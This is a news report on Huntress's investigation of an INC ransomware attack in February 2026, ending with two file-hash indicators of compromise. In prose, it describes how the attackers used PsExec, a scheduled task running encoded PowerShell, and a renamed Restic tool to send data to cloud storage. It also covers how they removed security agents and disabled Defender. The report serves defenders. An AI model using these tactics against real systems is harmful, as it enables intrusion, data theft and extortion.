Cybersecurity researchers at Huntress recently observed threat actors deploying INC ransomware following a sophisticated data exfiltration process.
On February 25, 2026, attackers compromised a customer’s infrastructure, stole sensitive data, and then encrypted the network.
The threat actors used native Windows tools such as PowerShell and PsExec to stage the attack, elevate privileges, and bypass early-detection systems.
Because the targeted organization had an incomplete deployment of security agents and lacked a Security Information and Event Management (SIEM) system, the attackers operated undetected during the initial phases.
Data Exfiltration and Evasion Tactics
The attack sequence began on February 24 when the threat actor accessed the targeted endpoint and mapped a network share.
They quickly launched the Microsoft-provided utility PsExec to elevate their system privileges. Following this, the attackers created a scheduled task named “Recovery Diagnostics” configured to execute a malicious script.
This task launched a base64-encoded PowerShell command that configured environmental variables for a cloud storage bucket. The attackers used a renamed version of the legitimate, open-source backup utility Restic, disguising it as winupdate.exe to blend in with normal system processes.
The script pointed to an S3 bucket hosted on Wasabi. It included hardcoded credentials, notably leaving the password as the simple word “password.”
A follow-up command instructed the disguised Restic tool to back up specific files listed in a text document, effectively exfiltrating the data to the attacker’s cloud infrastructure.
To prepare for the final ransomware deployment, the attackers methodically dismantled the endpoint’s security defenses.
On February 25, they ran an executable to uninstall the VIPRE Business Agent, and it was successfully removed using the standard uninstaller.
They also disabled Windows Defender by turning off Real-Time Protection. With the environment stripped of its security controls, the threat actor launched the INC ransomware executable, disguised as win.exe, which utilized the Windows RestartManager API to lock and encrypt files.
Incident Overlap and Attack Indicators
This attack method is not an isolated event, as Huntress analysts documented a nearly identical incident earlier in the month on February 9.
During that intrusion, the same threat actors used matching base64-encoded PowerShell commands to push a Restic configuration for data theft.
The cloud storage access keys and environment variables were identical across both attacks. In the earlier incident, the attackers used a tool called HRSword to turn off Acronis security services. However, rapid response efforts prevented the ransomware deployment.
Further validating this pattern, the Cyber Centaurs team reported remarkably similar activity tied to the INC ransomware infrastructure on January 22, 2026.
The consistent use of renamed backup utilities, hardcoded cloud credentials, and targeted removal of security tools highlights a standardized playbook used by this threat group.
Organizations are urged to monitor their environments for the following indicators of compromise associated with this INC ransomware campaign:
| Indicator | Description |
|---|---|
1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d |
SHA256 hash for C:\123\edr.exe |
e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13 |
SHA256 hash for c:\perflogs\win.exe |
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.
